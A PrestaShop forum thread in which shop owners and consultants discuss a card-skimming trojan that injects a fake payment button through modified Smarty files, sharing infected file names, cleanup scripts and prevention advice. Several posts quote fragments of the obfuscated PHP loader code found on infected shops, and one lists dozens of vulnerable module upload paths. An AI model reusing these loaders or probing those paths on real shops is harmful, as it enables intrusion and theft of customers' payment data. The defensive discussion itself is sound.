Prescol Posted January 12, 2023 Share Posted January 12, 2023 (edited) I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out. The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable. $tpl_var = Smarty_Internal_Validate::Validate($tpl_var); It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl. Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. Edited January 12, 2023 by Prescol (see edit history) 5 Link to comment Share on other sites More sharing options...
TiaNex Shopping Posted January 13, 2023 Share Posted January 13, 2023 thank you for you work, what's the content of Smarty_Internal_Validate::Validat Link to comment Share on other sites More sharing options...
JakubMlk Posted January 16, 2023 Share Posted January 16, 2023 I passed the same injection today, it inffect a lot of files, but I don't know how to prevent to be infected. To correct your Presta it helps to copy original files over infected ones. Infected files: controllers\front\IndexController.php modules\bankwire\controllers\front\validation.php tools\smarty\sysplugins\smarty_cacheresource.php tools\smarty\sysplugins\smarty_internal_data.php cache\tcpdf\index.php Link to comment Share on other sites More sharing options...
Eolia Posted January 27, 2023 Share Posted January 27, 2023 Use my cleaner.php this hack is detected https://devcustom.net/public/scripts/cleaner.zip Open the zip Take the cleaner.php file and place it at the root of your site Then you call it with this url: https://yoursite.com/cleaner.php 1 Link to comment Share on other sites More sharing options...
skur2000 Posted February 2, 2023 Share Posted February 2, 2023 Best topic, we have this problem, and solve this. thanks ! 1 Link to comment Share on other sites More sharing options...
Shin_P Posted February 2, 2023 Share Posted February 2, 2023 On 1/12/2023 at 5:07 PM, Prescol said: I spent 6 hours finding the files modified by this trojan who replaces checkout process with its own content to stole credit card or paypal accounts. So, in order to prevent to you more hours of research, here are some tips to find it out. The attacker injects a code into smarty_cacheresource.php. This code, which is obsuscated in a way only a russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it. Then, a subtle modification is added into smarty_internal_data::assign() method. The following line is added before assigning a variable. $tpl_var = Smarty_Internal_Validate::Validate($tpl_var); It looks like it is part of Prestashop environment, but is not. This call injects into $hook_header a malicious javascript, which is responsible for replacing the original payment button with the fake one. I found the same behavior recently in another shop, but the way they injected the code were much simpler, by decoding a file containing malicious javascirpt within a tpl. Hope it helps to you if are under the same situation. For me was a pain in the ass spending half day searching it. I migrated to 1.7 because of this trojan IDK what's worse.. 2 Link to comment Share on other sites More sharing options...
Eolia Posted February 2, 2023 Share Posted February 2, 2023 Lol This trojan is on 1.7/8 versions too^^ 1 1 Link to comment Share on other sites More sharing options...
Shin_P Posted February 2, 2023 Share Posted February 2, 2023 (edited) f**k. me. so what does your "cleaner" do? overwrites the core modified files? has anyone found the point of entry of this hack? i thought was either the outdated php version I was running with (5.6) or the PS installation (1.6) now im on php 7.4 and PS 1.7 please tell me I'm OK or I'll kill myself XD Edited February 2, 2023 by Shin_P (see edit history) 1 Link to comment Share on other sites More sharing options...
Eolia Posted February 2, 2023 Share Posted February 2, 2023 Cleaner scans and informs you if core files have been modified, if known infections have been added, blocks certain malicious codes, destroys known added files. The infection comes either from a badly secured third-party module, or from another CMS installed on the same hosting (WordPress not up to date or other) The PHP version has nothing to do with the hack. The 1.6.2 version will be so cool 1 Link to comment Share on other sites More sharing options...
Shin_P Posted February 2, 2023 Share Posted February 2, 2023 well i had an out of date WP blog ...... 🙄 thank very much you for the informations page bookmarked, but truly hope I won't need it soon XD Link to comment Share on other sites More sharing options...
Jurist Posted February 2, 2023 Share Posted February 2, 2023 looks like mulitple store of ours have just been attacked by this. How do we prevent that issue? Cleanup is not enough. We need to stop that from happening Link to comment Share on other sites More sharing options...
Prescol Posted February 2, 2023 Author Share Posted February 2, 2023 It is a planned atack and backed by an institution, not someone in his house, bad times are coming for maintenance since each time a prestashop store is attacked it is made with zero day exploits, meaning they were kept secret until today. 1 Link to comment Share on other sites More sharing options...
Shin_P Posted February 2, 2023 Share Posted February 2, 2023 time to get more religious 🙏 Link to comment Share on other sites More sharing options...
Prestachamps Posted February 6, 2023 Share Posted February 6, 2023 Hi @Prescol, Thank you for helping to others by sharing the information. Have a nice day, Leo. Link to comment Share on other sites More sharing options...
El Patron Posted February 6, 2023 Share Posted February 6, 2023 on clean shop this module will tell you when files have been modified, size/time/group/owner. commit trusted change restore untrusted change from built in vault not one bug fix required since written for ps 1.4 also allows one to monitor what files your developer may have changed, priceless https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215 Link to comment Share on other sites More sharing options...
nsordk Posted February 9, 2023 Share Posted February 9, 2023 Had my own fight with this today and would like to share my findings. I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back. After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php These changes allowed the intruder to call ini.php though POST and it would create this file in the root. It was the plugin TMSocialLogin that was used as a way in. This was on Prestashop 1.6 Link to comment Share on other sites More sharing options...
Eolia Posted February 9, 2023 Share Posted February 9, 2023 il y a 2 minutes, nsordk a dit : Had my own fight with this today and would like to share my findings. I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes was back. After searching access logs i found that 2 files in classes was changed. Tools.php and Dispatcher.php These changes allowed the intruder to call ini.php though POST and it would create this file in the root. It was the plugin TMSocialLogin that was used as a way in. This was on Prestashop 1.6 Cleaner detect this^^ https://shop.devcustom.net/fr/content/16-nettoyage-hack Link to comment Share on other sites More sharing options...
El Patron Posted February 9, 2023 Share Posted February 9, 2023 On 2/6/2023 at 6:11 PM, PrestaHeroes.com said: on clean shop this module will tell you when files have been modified, size/time/group/owner. commit trusted change restore untrusted change from built in vault not one bug fix required since written for ps 1.4 also allows one to monitor what files your developer may have changed, priceless https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215 this will detect and you can restore. if you manually detect and 'fix', set the leak files to read only. also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules... Link to comment Share on other sites More sharing options...
Eolia Posted February 10, 2023 Share Posted February 10, 2023 Il y a 12 heures, Fred PrestaHeroes a dit : also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules... Lol last infections detected on 1.7.8 version /*b3b2b*/ @include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co"); /*b3b2b*/ fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico Link to comment Share on other sites More sharing options...
El Patron Posted February 10, 2023 Share Posted February 10, 2023 11 hours ago, Eolia said: Lol last infections detected on 1.7.8 version @include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co"); fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico Oh, so you think all ps are hacked? I think it's more when people use free mods which i defended to have removed from the forum....also 1.7.5 and earlier ps did dirty they create mod folder with 777 during installation. I caught them once years ago and they took it away...but it's back... we do a lot of different stores and many customers over the years the number of people hacked was zero. We are getting new customers who are currently being hacked, one selling balls in the US for over 1,000,000 a month...the hack sent all customer info and cc info. Amazing.. Anyway, I "know" I wrote the best detect/restore module for "any" cms after my 1.4 module store was hacked, I was pissed loool. we also have a plesk extension that does what ImunifyAV does but also has rollback...among other things. cybersecurity is like porn, but you have to pay for it. it's me I also have a module that analyzes ps permissions, we thought of releasing it for free but it provides information for hackers to attack....amazing. using google translate, why do we even have separate forums, today's browser translations work fine... Have a good weekend Link to comment Share on other sites More sharing options...
Eolia Posted February 10, 2023 Share Posted February 10, 2023 (edited) I'm just saying that the PS version has nothing to do. For a hack to take place there are not 36 solutions: - Theft of FTP credentials - Unsecured module with upload functions - Other unsecured CMS on the same hosting (8 obsolete WPs lately have infected PS) Prestashop, since versions 1.2 has always controlled uploads and has never allowed direct access to these directories. Regarding the rights, once a module is installed, regardless of whether it is 777, 755 or other, PHP can run create modify directories. Edited February 10, 2023 by Eolia (see edit history) Link to comment Share on other sites More sharing options...
Prescol Posted February 10, 2023 Author Share Posted February 10, 2023 If you speak in English in this channel, everyone could know what are you talking about and the information will be useful for all, despite this message is posted in the english channel. Please @Eolia and fred, im appealing to your experience in the forum, update your messages with an english version. Link to comment Share on other sites More sharing options...
Stefand Posted February 11, 2023 Share Posted February 11, 2023 It this reported to PrestaShop team? 1 Link to comment Share on other sites More sharing options...
Eolia Posted February 11, 2023 Share Posted February 11, 2023 il y a 29 minutes, Stefand a dit : It this reported to PrestaShop team? Why ? It's not a Prestashop issue. 1 Link to comment Share on other sites More sharing options...
Stefand Posted February 12, 2023 Share Posted February 12, 2023 @EoliaI don't understand the trojan new method at all in this post. "The attacker injects a code into smarty_cacheresource.php" This is a default file in PrestaShop right? How is this trojan injected as the owner of this post says? Or is it injected in that file through a module? Link to comment Share on other sites More sharing options...
Eolia Posted February 12, 2023 Share Posted February 12, 2023 No, this smarty_cacheresource.php story could only allow a possible reading of the database by XSS injection and ONLY in case you have activated MySQL caching. A patch has been proposed for all versions at this level. Today's hacks have nothing to do with and, FYI, have been around for a long time. https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque/16 3 Link to comment Share on other sites More sharing options...
Eolia Posted February 13, 2023 Share Posted February 13, 2023 Cleaner check this file in your admin dir: get-file-admin.php if this file not exists it's a real problem... 1 Link to comment Share on other sites More sharing options...
redrum Posted March 18, 2023 Share Posted March 18, 2023 On 1/27/2023 at 5:21 PM, Eolia said: Use my cleaner.php this hack is detected https://devcustom.net/public/scripts/cleaner.zip Open the zip Take the cleaner.php file and place it at the root of your site Then you call it with this url: https://yoursite.com/cleaner.php I suggest you change the behavior of the script, so it don't delete, edit or replace files automatically. A better approach would be to display all the errors and let the user decide if he want to delete, edit or replace each error. Link to comment Share on other sites More sharing options...
Boonyawat Posted April 10, 2023 Share Posted April 10, 2023 Is there a way to prevent this? I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again. Link to comment Share on other sites More sharing options...
El Patron Posted April 10, 2023 Share Posted April 10, 2023 14 hours ago, Boonyawat said: Is there a way to prevent this? I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again. yes, upgrade to latest 1.7, remove all those disabled and free modules... stop loading free modules, I don't know why PS allows unvetted free modules on forums. very few hacks have been successful with 'addons' betted modules. then put on hosting that supports Immunavy.... if PS is not a hobby but serious business, sitting on hands on old PS...that's on you, loading free unvetted modules...that is on PS and you Link to comment Share on other sites More sharing options...
PrestaPro LTD Posted May 19, 2023 Share Posted May 19, 2023 Hello everyone again. This means that Prestashop and other free software has run out of steam, if you don't have a lot of money or are not the smartest programmer in the world, a PrestaShop store will never be safe. 1 Link to comment Share on other sites More sharing options...
doekia Posted May 19, 2023 Share Posted May 19, 2023 Le 4/10/2023 à 10:54 PM, PrestaHeroes USA a dit : very few hacks have been successful with 'addons' betted modules. - sendtoafriend (native) - paypal (native) - all modules with php-unit ... eval-stdin.php (native & addons) - attributewizardpro (addons) - cartabandonmentpro (addons) - ... List contains numerous examples that contradict such statement. 2 Link to comment Share on other sites More sharing options...
El Patron Posted May 19, 2023 Share Posted May 19, 2023 5 hours ago, doekia said: - sendtoafriend (native) - paypal (native) - all modules with php-unit ... eval-stdin.php (native & addons) - attributewizardpro (addons) - cartabandonmentpro (addons) - ... List contains numerous examples that contradict such statement. well that is very few compared to the 1000's on there, at least they have to go through validation, so yes three are a few, I would think PS updated their validation to try to keep those things from happent, on the free modules, that does not happen...so your point falls on deaf ears Link to comment Share on other sites More sharing options...
Eolia Posted May 19, 2023 Share Posted May 19, 2023 Very few ? yuzu/yuzuCheck.php yuzu/yuzuApi.php columnadverts/uploadimage.php columnadverts/slides/error.php vtemslideshow/uploadimage.php vtemslideshow/slides/error.php realty/include/uploadimage.php realty/include/slides/error.php realty/evogallery/uploadimage.php realty/evogallery/slides/error.php realty/evogallery2/uploadimage.php realty/evogallery2/slides/error.php resaleform/upload.php filesupload/error.php megaproduct/ megaproduct/error.php soopamobile/uploadimage.php soopamobile/slides/error.php soopamobile2/uploadimage.php soopamobile2/slides/error.php soopamobile2/uploadproduct.php soopabanners/uploadimage.php soopabanners/slides/error.php vtermslideshow/uploadimage.php vtermslideshow/slides/error.php simpleslideshow/uploadimage.php simpleslideshow/slides/error.php productpageadverts/uploadimage.php productpageadverts/slides/error.php homepageadvertise/uploadimage.php homepageadvertise/slides/error.php homepageadvertise2/uploadimage.php homepageadvertise2/slides/error.php columnadverts2/uploadimage.php columnadverts2/slides/error.php filesupload/upload.php filesupload/uploads/error.php jro_homepageadvertise/uploadimage.php jro_homepageadvertise/slides/error.php jro_homepageadvertise2/uploadimage.php jro_homepageadvertise2/slides/error.php leosliderlayer/uploadimage.php leosliderlayer/slides/error.php leosliderlayer/upload_images.php vtemskitter/uploadimage.php vtemskitter/img/error.php additionalproductstabs/file_upload.php additionalproductstabs/file_uploads/error.php addthisplugin/file_upload.php addthisplugin/file_uploads/error.php attributewizardpro/file_upload.php attributewizardpro/file_uploads/error.php attributewizardpro.OLD/file_upload.php attributewizardpro.OLD/file_uploads/error.php 1attributewizardpro/file_upload.php 1attributewizardpro/file_uploads/error.php attributewizardpro_x/file_upload.php attributewizardpro_x/file_uploads/error.php advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%252526id_slide=php advancedslider/uploads/error.php bamegamenu/ajax_phpcode.php cartabandonmentpro/upload.php cartabandonmentpro/uploads/error.php cartabandonmentproOld/upload.php cartabandonmentproOld/uploads/error.php videostab/ajax_videostab.php?action=submitUploadVideo%252526id_product=upload videostab/uploads/error.php fieldvmegamenu/ajax/upload.php fieldvmegamenu/uploads/error.php orderfiles/ajax/upload.php orderfiles/files/error.php pk_flexmenu/ajax/upload.php pk_flexmenu/uploads/error.php pk_flexmenu_old/ajax/upload.php pk_flexmenu_old/uploads/error.php pk_vertflexmenu/ajax/upload.php pk_vertflexmenu/uploads/error.php nvn_export_orders/upload.php nvn_export_orders/error.php tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php tdpsthemeoptionpanel/upload/error.php psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php psmodthemeoptionpanel/upload/error.php lib/redactor/file_upload.php blocktestimonial/addtestimonial.php colorpictures explorerpro sampledatainstall vm_advancedconfigurator marketplace/libs/filemanager/dialog.php ec_import/upload.php vtemskitter/uploadimage.php blocktestimonial/addtestimonial.php /index.php?fc=module&module=orderfiles&controller=filesmanager /index.php?fc=module&module=supercheckout&controller=supercheckout&ajax=1&method=SaveFilesCustomField smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php Injection possible depuis plusieurs fichiers du module infobia_properso: infobia_properso/admin/upload.php infobia_properso/admin/upload_motif.php infobia_properso/maquetteajax.php infobia_properso/transfert.php infobia_properso/transfert2.php infobia_properso/transfertjson.php infobia_properso/upload.php infobia_properso/uploadfile.php nvn_excel_import/hayageekupload/php/upload.php nvn_excel_import/upload.php nvn_excel_import/uploadify.php pkfacebook 2 Link to comment Share on other sites More sharing options...
doekia Posted May 20, 2023 Share Posted May 20, 2023 And this list is not exhaustive neither ! Link to comment Share on other sites More sharing options...
Mediacom87 Posted May 20, 2023 Share Posted May 20, 2023 (edited) Hi, To believe that only free modules are used as a gateway for hacking is a blatant mistake. 100% of the hacks I've been working on for months are related to paid modules. Some information: https://www.mediacom87.fr/en/proactive-or-corrective-prestashop-security/ Edited May 20, 2023 by Mediacom87 (see edit history) 3 Link to comment Share on other sites More sharing options...
DARKF3D3 Posted May 20, 2023 Share Posted May 20, 2023 On 7/2/2023 at 12:11 AM, PrestaHeroes USA dice: on clean shop this module will tell you when files have been modified, size/time/group/owner. commit trusted change restore untrusted change from built in vault not one bug fix required since written for ps 1.4 also allows one to monitor what files your developer may have changed, priceless https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215 It is compatible with PS8 and PHP8.1? Link to comment Share on other sites More sharing options...
El Patron Posted May 20, 2023 Share Posted May 20, 2023 3 hours ago, DARKF3D3 said: It is compatible with PS8 and PHP8.1? I have just assigned someone to validate our modules on ps8, pv will be one of the first. Will update here or via messenger. Note: we have a plesk version of this module which has more features and can protect other/all domains defined to plesk....in case anyone interested. 1 Link to comment Share on other sites More sharing options...
DARKF3D3 Posted May 21, 2023 Share Posted May 21, 2023 Thank you, I could be interested into the plesk version. Link to comment Share on other sites More sharing options...
Nickz Posted May 21, 2023 Share Posted May 21, 2023 Shop owners should commence employing people in charge of taking care of your shop(s). How can you put your income source solely in the abilities of self help forums? 1 Link to comment Share on other sites More sharing options...
DARKF3D3 Posted May 21, 2023 Share Posted May 21, 2023 Are you talking to me? Link to comment Share on other sites More sharing options...
MockoB Posted July 13, 2023 Share Posted July 13, 2023 Hi @Eolia just tried your module on PS8.1 and it is not working properly. Is there any chance you'll make it compatible with the latest PS version? Thanks. Link to comment Share on other sites More sharing options...
Eolia Posted July 13, 2023 Share Posted July 13, 2023 No, see with Prestashop Team. 1 Link to comment Share on other sites More sharing options...
ronniee Posted November 16, 2023 Share Posted November 16, 2023 Hi, I have a PS 1.6.1.4 version, in march it was hacked somehow redirected card payment page. At that time I solved with this:(link)To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6): if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') { include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php'; $smarty->caching_type = 'mysql'; } Right now again it was discovered JS/SpyBanker.IVtrojan. I see some files changed, for ex. classes/shop/shop.php classes/Store.php etc. has something like this at the end:$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21].$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36].$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[2KCk7IAl9Owo='));@$x3e4e();} i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person my question is the upper solution with cleaner.zip is ok for this old 1.6.1.4 version? thank you ron Link to comment Share on other sites More sharing options...
Eolia Posted November 16, 2023 Share Posted November 16, 2023 Yes, cleaner is ok ! Link to comment Share on other sites More sharing options...
Nickz Posted November 16, 2023 Share Posted November 16, 2023 1 hour ago, ronniee said: i know that the updgrare is imminent but right now i need to restart the shop asap, but right now i dont finded the right person This and further hacks will (most likely) increase. It should lead to a broader concept of shops. Do not only have one shop, have several, that way you can redirect visitors and it's highly unlikely that you hacked all versions. Those set ups need time to monitor. Businesses grow and so does their employee number. Search your log and access files you might get the perpetrator. Link to comment Share on other sites More sharing options...
micelio Posted February 8 Share Posted February 8 On 2/2/2023 at 11:55, Eolia said: Lol Questo trojan è presente anche nelle versioni 1.7/8^^ Hi Eolia, thank you for providing your cleaner.php which I used on one of my sites and discovered it was infected. I replaced all the files in red with the original files from the exact version of prestashop 1.6.1.20. This did not solve the initial problem that the generated pdf invoices are unreadable.. I attach img. Since I have two domains with two different sites in the same Hosting space, I would like to check the second site too, which is made with prestashop 1.7.8.8 I tried to put the cleaner.php in different places, but if I put it in public_html it starts but I read in "cleaner" that there are two directories to close one or something like that, how can I make cleaner? also do you have any suggestion for the correct creation of pdf invoices, thanks Have a nice day Elio Link to comment Share on other sites More sharing options...
Eolia Posted February 8 Share Posted February 8 delete your second admin. Link to comment Share on other sites More sharing options...
micelio Posted February 9 Share Posted February 9 22 hours ago, Eolia said: delete your second admin. How? delete your second admin. But there is a site built in the second domain. Or maybe there is um method I don't know, so I can control the second site, thanks Link to comment Share on other sites More sharing options...
Eolia Posted February 9 Share Posted February 9 2 different Prestashop sites cannot have files in common. Your second site must be in another directory. A Prestashop site must only have one admin directory. Link to comment Share on other sites More sharing options...
Nickz Posted February 9 Share Posted February 9 2 hours ago, micelio said: Or maybe there is um method I don't know, so I can control the second site, thanks Why don't you take the time and plan ahead, the 1.6 site you could convert into a eolia shop or Thirtybees. That way you have a fresh design, can clean the database and speed everything up. To use 2 shops in the same hosting is not really prudent, I know most people act due to ease. But you become dependent. Dependency is not what you need in business. It costs you about €50 to 100 per year to use a 2nd hosting. The times where one shop conquered the world like Amazon are clearly over. Several shops raise chances in ranking over a broader spectrum and give you more security. Except if they infect your PC. If you wish for safety, use a Laptop to access shops and another to open emails. Link to comment Share on other sites More sharing options...
micelio Posted February 9 Share Posted February 9 5 hours ago, Eolia said: 2 different Prestashop sites cannot have files in common. Your second site must be in another directory. A Prestashop site must only have one admin directory. do you know if there is a practical way to separate the two sites? Since they are both in the same hosting is they have folders in common. The second domonio is under construction, I could redo it and it is not a problem. I would just like to save the site which is: www.micelimoto.com and I am fine with prestashop version 1.6.1.20 Thank you Link to comment Share on other sites More sharing options...
Eolia Posted February 9 Share Posted February 9 Keep all your directories except the duplicate admin. Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory. Then, install your Prestashop (or PhenixSuite) in your new directory) Link to comment Share on other sites More sharing options...
micelio Posted February 9 Share Posted February 9 2 hours ago, Eolia said: Keep all your directories except the duplicate admin. Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory. Then, install your Prestashop (or PhenixSuite) in your new directory) I think I am not capable of doing what you tell me. I can create in the same level as public_html a new directory (new folder) and name it after the name of the 2 domain, okay? I don't know how to get my second domain to point to this new directory. But won't all the existing shared directories of the two different versions of prestashop bother each other? Could you help me with that? I would like to correct this situation I have in hosting. Create two completely separate sites in the same space, each with its own version of prestashop. Do you think this correction can be made? Thanks Link to comment Share on other sites More sharing options...
Eolia Posted February 9 Share Posted February 9 At your host you can define to which folder the new domain should be directed. Link to comment Share on other sites More sharing options...
Maxflor Posted February 15 Share Posted February 15 Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much Link to comment Share on other sites More sharing options...
Nickz Posted February 15 Share Posted February 15 1 hour ago, Maxflor said: and our server is overwhelmed and crashes. Make a backup, export the database, clean everything up. Get a better server. While you at it change access to backend, databases. In your shoes I would redo the entire shop. Link to comment Share on other sites More sharing options...
Maxflor Posted February 15 Share Posted February 15 Nickz how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit. Thank you very much Link to comment Share on other sites More sharing options...
Mediacom87 Posted February 15 Share Posted February 15 il y a 33 minutes, Maxflor a dit : Nickz how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect clodflare to the website to speed it up a bit. Thank you very much Explain how to do in 2 minutes something that takes at least a day to do. There are no secrets, no tricks to be passed on, just common sense, an analysis of all the files, of the entire structure, knowing the normal PrestaShop structure by heart saves time, but that's something you acquire over the long term, and I'm not even talking about intervening on a site that has never respected anything. Everything has already been explained, sites reference all the security alerts, already posted several times, community modules allow you to identify vulnerabilities, already posted dozens of times, techniques have been explained, written in articles, to climb the first step of the staircase, but there's no secret, just work and knowledge. You've got flaws, you haven't fixed them, and since your site has been hacked, it's going to be hacked every week by one or other technique, since it's now on the list of sites to be hacked. The only way to do this is to clean up all the code in all the modules, one by one. Link to comment Share on other sites More sharing options...
Eolia Posted February 15 Share Posted February 15 Il y a 3 heures, Maxflor a dit : Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much https://devcustom.net/public/scripts/cleaner.zip Open the zip Take the cleaner.php file and place it at the root of your site Then you call it with this url: https://yoursite.com/cleaner.php 2 Link to comment Share on other sites More sharing options...
sebastienazar Posted February 15 Share Posted February 15 VERY GOOD TOOLS ! Thank you for evolution ! Link to comment Share on other sites More sharing options...
Nickz Posted February 15 Share Posted February 15 10 hours ago, Maxflor said: how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. Redoing a shop removes every possible entrance to your shop. Removing parts of code leaves the shop open to new hacks. mails which are sent from your server mean you are hacked. Link to comment Share on other sites More sharing options...
braccetto Posted March 1 Share Posted March 1 Hi friend i've been attacked by trojan some days ago i placed a backup on local and tried the cleaner.php but not working at well. - It starts and check for upgrading - it download the upgraded file ('3.1.9') and reneamed itsefl by alfanumeric one - but it stucks and don't start (also tried to reneme again in cleaner.php but it restart to says "telechargement de la dernier version....." - i'm now in a loop, because after "telechargement" it sais "impossible to reach site" anyone know is compatible with ps 1.6.1.7 and php 7? (the version i'm running) Link to comment Share on other sites More sharing options...
sebastienazar Posted March 1 Share Posted March 1 il faut augmenter la mémoire du serveur avec un php.ini ca a fonctionné pour moi. Link to comment Share on other sites More sharing options...
El Patron Posted March 15 Share Posted March 15 to know when files are changed on your PrestaShop this module will alert you, if unauthorized changes you can restore the file(s). Nothing like this for any CMS on the planet. https://prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215 Link to comment Share on other sites More sharing options...
skur2000 Posted March 22 Share Posted March 22 hi friends. can help me, old prestashop 1.6 version with 3.2.1 cleaner have 500 internal server error. i use old version cleaner script, this update after run, and i see change name this script and next - internal server error after seconds run script work. logs clear. before cleaner started and work very fine, may be after script update this 500 Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator at to inform them of the time this error occurred, and the actions you performed just before this error. More information about this error may be available in the server error log. Link to comment Share on other sites More sharing options...
Atomico Posted April 16 Share Posted April 16 On 1/27/2023 at 5:21 PM, Eolia said: Use my cleaner.php this hack is detected https://devcustom.net/public/scripts/cleaner.zip Open the zip Take the cleaner.php file and place it at the root of your site Then you call it with this url: https://yoursite.com/cleaner.php Hello, i am trying your script but after a first update, i receive error 500. Link to comment Share on other sites More sharing options...
Nickz Posted April 16 Share Posted April 16 (edited) 48 minutes ago, Atomico said: Hello, i am trying your script but after a first update, i receive error 500. look into the server-logs, many times here: var/log/apache2/errorlog Edited April 16 by Nickz (see edit history) Link to comment Share on other sites More sharing options...
Atomico Posted April 17 Share Posted April 17 15 hours ago, Nickz said: look into the server-logs, many times here: var/log/apache2/errorlog Hello, i have only these 2 row : [Wed Apr 17 08:48:45.882526 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] [client xxxxxx:33932] AH01067: Failed to read FastCGI header [Wed Apr 17 08:48:45.882574 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] (104)Connection reset by peer: [client xxxxxx:33932] AH01075: Error dispatching request to : Link to comment Share on other sites More sharing options...
Nickz Posted April 17 Share Posted April 17 8 hours ago, Atomico said: AH01067: Failed to read FastCGI header have a look here: https://serverpilot.io/docs/error-failed-to-read-fastcgi-header/ Link to comment Share on other sites More sharing options...
El Patron Posted April 17 Share Posted April 17 (edited) Our FileStasis Attack Surface Monitor(ASM) + Restore for PrestaShop module will 1) build vault of mission critical files 2) monitor and report when file changes/additions/deletions are found, allows you to commit trusted change to vault or restore untrusted change from vault. The most important part of detecting hack is knowing which files changed, that is the purpose of this module. https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983 Edited May 17 by PrestaHeroes USA (see edit history) Link to comment Share on other sites More sharing options...
Peter_S83 Posted September 11 Share Posted September 11 Got one question, the cleaner is good, but I got one problem. When I make the scan to bigger files it detects Fichier dangereux supprimé (shell_exec) => web/modules/securitypro/securitypro.phpVoir and deleted it. But this is the security plugin, that has of course a lot of rights, this shouldn't be deleted. How can I prevent him to do it? Link to comment Share on other sites More sharing options...
Peter_S83 Posted September 11 Share Posted September 11 And another question, what does he scan, as I see, he create a folder private/bak and there is my whole site? Why and what is he changing ? Link to comment Share on other sites More sharing options...
Eolia Posted September 11 Share Posted September 11 shell_exec is a very big risk on a php script, besides many hosts block this function. Cleaner don't create any folder, only zip files with detected files. If you are happy with your security pro, why use cleaner? Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now